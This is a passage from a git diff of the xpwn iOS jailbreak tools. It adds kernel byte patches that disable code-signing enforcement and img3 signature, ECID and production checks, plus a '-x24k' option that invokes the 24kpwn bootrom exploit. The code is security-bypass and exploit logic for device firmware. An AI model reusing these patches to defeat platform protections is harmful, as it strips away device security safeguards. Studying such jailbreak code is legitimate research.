0x04, 0x46}; + + // 3.0 arm7 img3 signature patch + const char n88patch_test3[] = {0x01, 0x99, 0xFF, 0xF7, 0xBE, 0xFC, 0x00, 0xB3}; + size_t length = file->getLength(file); - uint8_t* buffer = (uint8_t*)malloc(length); + uint8_t* buffer = (uint8_t*)malloc(length + sizeof(patch)); file->seek(file, 0); file->read(file, buffer, length); + memset(buffer + length, 0, sizeof(patch)); int retval = 0; int i; for(i = 0; i < length; i++) { uint8_t* candidate = &buffer[i]; if(memcmp(candidate, patch, sizeof(patch)) == 0) { + XLOG(3, "kernel patch1 success\n"); fflush(stdout); candidate[4] = 0x01; file->seek(file, i); file->write(file, candidate, sizeof(patch)); retval = TRUE; continue; } - if(memcmp(candidate, patch2, sizeof(patch2)) == 0) { - candidate[0] = 0x00; + if(memcmp(candidate, patch_old, sizeof(patch_old)) == 0) { + XLOG(3, "kernel patch_old success\n"); fflush(stdout); + candidate[0] = 0x0; file->seek(file, i); - file->write(file, candidate, sizeof(patch2)); + file->write(file, candidate, sizeof(patch_old)); retval = TRUE; continue; } if(memcmp(candidate, patch3, sizeof(patch3)) == 0) { + XLOG(3, "kernel patch3 success\n"); fflush(stdout); candidate[0] = 0x2B; candidate[1] = 0x99; candidate[2] = 0x00; @@ -389,6 +527,155 @@ int patchKernel(AbstractFile* file) { retval = TRUE; continue; } + if(Do30Patches && memcmp(candidate, patch2, sizeof(patch2)) == 0) { + XLOG(3, "kernel patch2 success\n"); fflush(stdout); + // NOP out the BMI + candidate[6] = 0x00; + candidate[7] = 0x28; + file->seek(file, i); + file->write(file, candidate, sizeof(patch2)); + retval = TRUE; + continue; + } + if(Do30Patches && memcmp(candidate, patch4, sizeof(patch4)) == 0) { + XLOG(3, "kernel patch4 success\n"); fflush(stdout); + candidate[3] = 0x20; + file->seek(file, i); + file->write(file, candidate, sizeof(patch4)); + retval = TRUE; + continue; + } + if(Do30Patches && memcmp(candidate, patch5, sizeof(patch5)) == 0) { + XLOG(3, "kernel patch5 success\n"); fflush(stdout); + candidate[0] = 0x00; + candidate[1] = 0x25; + file->seek(file, i); + file->write(file, candidate, sizeof(patch5)); + retval = TRUE; + continue; + } + if(Do30Patches && memcmp(candidate, n88patch1, sizeof(n88patch1)) == 0) { + XLOG(3, "kernel armv7 vm_map_enter patch success\n"); fflush(stdout); + candidate[6] = 0x8B; + candidate[7] = 0x46; + candidate[8] = 0x8B; + candidate[9] = 0x46; + file->seek(file, i); + file->write(file, candidate, sizeof(n88patch1)); + retval = TRUE; + continue; + } + if(Do30Patches && memcmp(candidate, n88patch2, sizeof(n88patch2)) == 0) { + XLOG(3, "kernel armv7 cs patch success\n"); fflush(stdout); + candidate[6] = 0x1; + file->seek(file, i); + file->write(file, candidate, sizeof(n88patch2)); + retval = TRUE; + continue; + } + if(Do30Patches && memcmp(candidate, n88patch4, sizeof(n88patch4)) == 0) { + XLOG(3, "kernel armv7 img3 prod patch success\n"); fflush(stdout); + candidate[2] = 0x00; + candidate[3] = 0x20; + candidate[4] = 0x00; + candidate[5] = 0x20; + file->seek(file, i); + file->write(file, candidate, sizeof(n88patch4)); + retval = TRUE; + continue; + } + if(Do30Patches && memcmp(candidate, n88patch5, sizeof(n88patch5)) == 0) { + XLOG(3, "kernel armv7 img3 ecid patch success\n"); fflush(stdout); + candidate[2] = 0x00; + candidate[3] = 0x20; + candidate[4] = 0x00; + candidate[5] = 0x20; + file->seek(file, i); + file->write(file, candidate, sizeof(n88patch5)); + retval = TRUE; + continue; + } + if(Do30Patches && memcmp(candidate, n88patch6, sizeof(n88patch6)) == 0) { + XLOG(3, "kernel armv7 img3 signature patch success\n"); fflush(stdout); + candidate[2] = 0x00; + candidate[3] = 0x20; + candidate[4] = 0x00; + candidate[5] = 0x20; + file->seek(file, i); + file->write(file, candidate, sizeof(n88patch6)); + retval = TRUE; + continue; + } + if(Do30Patches && memcmp(candidate, n88patch_test1, sizeof(n88patch_test1)) == 0) { + XLOG(3, "kernel armv7 img3 ParseFirmwareFooter patch success\n"); fflush(stdout); + candidate[2] = 0x00; + candidate[3] = 0x20; + file->seek(file, i); + file->write(file, candidate, sizeof(n88patch_test1)); + retval = TRUE; + continue; + } + if(Do30Patches && memcmp(candidate, n88patch_test2, sizeof(n88patch_test2)) == 0) { + XLOG(3, "kernel armv7 img3 CheckMetaTags patch success\n"); fflush(stdout); + candidate[2] = 0x00; + candidate[3] = 0x20; + candidate[4] = 0x00; + candidate[5] = 0x20; + file->seek(file, i); + file->write(file, candidate, sizeof(n88patch_test2)); + retval = TRUE; + continue; + } + if(Do30Patches && memcmp(candidate, n88patch_test3, sizeof(n88patch_test3)) == 0) { + XLOG(3, "kernel armv7 img3 encrypt SHSH with 89A patch success\n"); fflush(stdout); + candidate[2] = 0x01; + candidate[3] = 0x20; + candidate[4] = 0x01; + candidate[5] = 0x20; + file->seek(file, i); + file->write(file, candidate, sizeof(n88patch_test3)); + retval = TRUE; + continue; + } + if(Do30Patches && memcmp(candidate, patch6, sizeof(patch6)) == 0) { + if(candidate[7] != 0x4B) + continue; + + uint32_t cs_enforcement_disable = *((uint32_t*)(((intptr_t)(&candidate[6] + 0x4) & ~0x3) + (0x4 * candidate[6]))); + FLIPENDIANLE(cs_enforcement_disable); + + uint32_t offset = cs_enforcement_disable - 0xC0008000; + + XLOG(3, "kernel cs_enforcement_disable at: 0x%X, 0x%X\n", cs_enforcement_disable, offset); fflush(stdout); + + uint32_t value = 1; + + FLIPENDIANLE(value); + + *((uint32_t*)(buffer + offset)) = value; + + file->seek(file, offset); + file->write(file, &value, sizeof(value)); + continue; + } + if(Do30Patches && memcmp(candidate, n88patch3, sizeof(n88patch3)) == 0) { + uint32_t cs_enforcement_disable = *((uint32_t*)(((intptr_t)(&candidate[4] + 0x4) & ~0x3) + (((candidate[7] & 0xF) << 8) + candidate[6]))); + FLIPENDIANLE(cs_enforcement_disable); + + uint32_t offset = cs_enforcement_disable - 0xC0008000; + + XLOG(3, "kernel cs_enforcement_disable at: 0x%X, 0x%X\n", cs_enforcement_disable, offset); fflush(stdout); + + uint32_t value = 1; + + FLIPENDIANLE(value); + + *((uint32_t*)(buffer + offset)) = value; + + file->seek(file, offset); + file->write(file, &value, sizeof(value)); + continue; + } } free(buffer); @@ -400,9 +687,10 @@ int patchDeviceTree(AbstractFile* file) { const char patch2[] = "function-disable_keys"; size_t length = file->getLength(file); - uint8_t* buffer = (uint8_t*)malloc(length); + uint8_t* buffer = (uint8_t*)malloc(length + sizeof(patch2)); file->seek(file, 0); file->read(file, buffer, length); + memset(buffer + length, 0, sizeof(patch2)); int retval = 0; int i; ipsw-patch/pwnutil.c @@ -11,7 +11,7 @@ int main(int argc, char* argv[]) { init_libxpwn(); if(argc < 3) { - printf("usage: %s <infile> <outfile> [-t <template> [-c <certificate>]] [-k <key>] [-iv <key>]\n", argv[0]); + printf("usage: %s <infile> <outfile> [-x24k] [-t <template> [-c <certificate>]] [-k <key>] [-iv <key>] [-decrypt]\n", argv[0]); return 0; } @@ -21,6 +21,8 @@ int main(int argc, char* argv[]) { unsigned int* iv = NULL; int hasKey = FALSE; int hasIV = FALSE; + int x24k = FALSE; + int doDecrypt = FALSE; int argNo = 3; while(argNo < argc) { @@ -32,6 +34,15 @@ int main(int argc, char* argv[]) { } } + if(strcmp(argv[argNo], "-decrypt") == 0) { + doDecrypt = TRUE; + template = createAbstractFileFromFile(fopen(argv[1], "rb")); + if(!template) { + fprintf(stderr, "error: cannot open template\n"); + return 1; + } + } + if(strcmp(argv[argNo], "-c") == 0 && (argNo + 1) < argc) { certificate = createAbstractFileFromFile(fopen(argv[argNo + 1], "rb")); if(!certificate) { @@ -52,14 +63,26 @@ int main(int argc, char* argv[]) { hasIV = TRUE; } + if(strcmp(argv[argNo], "-x24k") == 0) { + x24k = TRUE; + } + argNo++; } AbstractFile* inFile; - if(hasKey) { - inFile = openAbstractFile2(createAbstractFileFromFile(fopen(argv[1], "rb")), key, iv); + if(doDecrypt) { + if(hasKey) { + inFile = openAbstractFile3(createAbstractFileFromFile(fopen(argv[1], "rb")), key, iv, 0); + } else { + inFile = openAbstractFile3(createAbstractFileFromFile(fopen(argv[1], "rb")), NULL, NULL, 0); + } } else { - inFile = openAbstractFile(createAbstractFileFromFile(fopen(argv[1], "rb"))); + if(hasKey) { + inFile = openAbstractFile2(createAbstractFileFromFile(fopen(argv[1], "rb")), key, iv); + } else { + inFile = openAbstractFile(createAbstractFileFromFile(fopen(argv[1], "rb"))); + } } if(!inFile) { fprintf(stderr, "error: cannot open infile\n"); @@ -76,7 +99,7 @@ int main(int argc, char* argv[]) { AbstractFile* newFile; if(template) { - if(hasKey) { + if(hasKey && !doDecrypt) { newFile = duplicateAbstractFile2(template, outFile, key, iv, certificate); } else { newFile = duplicateAbstractFile2(template, outFile, NULL, NULL, certificate); @@ -89,13 +112,19 @@ int main(int argc, char* argv[]) { newFile = outFile; } - if(hasKey) { + if(hasKey && !doDecrypt) { if(newFile->type == AbstractFileTypeImg3) { AbstractFile2* abstractFile2 = (AbstractFile2*) newFile; abstractFile2->setKey(abstractFile2, key, iv); } } + if(x24k) { + if(newFile->type == AbstractFileTypeImg3) { + exploit24kpwn(newFile); + } + } + inDataSize = (size_t) inFile->getLength(inFile); inData = (char*) malloc(inDataSize); inFile->read(inFile, inData, inDataSize); ipsw-patch/xpwntool.c 35b51a01b0f1a0a711896000d8aa7e2660fc2faf planetbeing planetbeing@gmail.com http://github.com/planetbeing/xpwn/commit/5c8b07519892de6a3a057aa0755b2e368d2a47db 5c8b07519892de6a3a057aa0755b2e368d2a47db 2009-07-18T01:19:36-07:00 2009-07-18T01:19:36-07:00 Imported a lot of stuff from dev team branch e91e26b96f3ec9e52c741e83343bcc0971f90303 planetbeing planetbeing@gmail.com